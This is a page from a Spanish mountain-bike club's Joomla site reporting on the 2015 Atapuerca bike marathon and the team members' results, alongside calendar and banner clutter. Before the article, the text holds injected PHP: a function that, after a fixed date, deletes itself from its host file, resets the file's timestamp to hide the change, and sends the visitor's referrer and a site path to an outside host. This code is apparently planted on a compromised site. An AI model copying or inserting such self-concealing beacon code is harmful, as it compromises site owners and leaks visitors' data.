check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Atapuerca bike maraton, duro y gran circuito.

La Afición

Calendario

<<  Abril 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
       1  2
  3  4  5  6  7  8  9
10111213141516
17181920212223
24252627282930
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Atapuerca bike maraton, duro y gran circuito. PDF Imprimir E-mail
Miércoles, 06 de Mayo de 2015 21:03

El domingo pasado se celebraba en Atapuerca la primera carrera del Open Maraton Bikezona, dentro del calendario nacional de la RFEC,  sobre un duro y técnico circuito de 70 kms y 2200 metros de desnivel positivo. Bajo el arco de salida se daban cita grandes corredores del panorama nacional y 150 bikers con ganas de pasarlo bien. Representando al CD Silos BTT, Jesus Puente, Rubén Castro y Alex Puente, con el Velobur-CD Silos Raúl Castrillo.

 

Todos con diferentes objetivos, Jesu venia bastante mermado por las malas vacaciones que había pasado, Rc con ganas de probarse en una de las grandes, Alex no en su mejor momento era una incógnita y Raúl intentaría estar con los buenos.

Salida intensa donde el grupo rápidamente se estira en la primera pequeña ascensión, para adentrarnos en terreno militar por sendas de hierva que hacia difícil el coger ritmo, para luego llegar a un descenso rápido y luego técnico por senda estrecha y llegar a los yacimientos, una impresionante estampa en el que todos los bikers pudieron disfrutar.

Todo el recorrido fue un continuo sube y baja, subidas cortas pero intensas y bajadas también cortas pero técnicas. Solamente del km 35 al 50 se pudo rodar un poco más cómodo, y en este punto fue donde Alex se encontró peor con calambres debido a la deshidratación, no se percató de un habitual lamiendo liquido y fue seco demasiados kilómetros, pero logró reponerse estirando un poco, para terminar de forma pletórica de menos a más y terminar en un meritorio puesto 33 de la general y 15 de su categoría. Por otra parte Jesu y Rc salieron bastante tranquilos, Rc mejor, a un buen ritmo, el que no fue suficiente porque no logro pasar el estricto corte de paso que dispuso la organización. Rc contrariado termino en un buen puesto en el recorrido corto con ganas de mas, posiblemente hubiera conseguido terminar el recorrido largo. La actuación de Jesu mas discreta como nos tiene acostumbrados, ni en el post carrera consiguió despuntar. Raúl Castrillo toda la carrera en el grupo cabezero, después de algún que otro despiste en el recorrido llegó a meta en un meritorio séptimo puesto de la general y primero de su categoría.

La próxima prueba del Open Bikezona, se disputa en casa, y será el próximo 30 de Agosto......Colina Triste 2015 promete!!!

Esta semana varios componentes del equipo se desplazarán a Oña, prueba dentro del circuito provincial de Burgos...Gooooo!!!! Deportivooooo!!!!!

 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.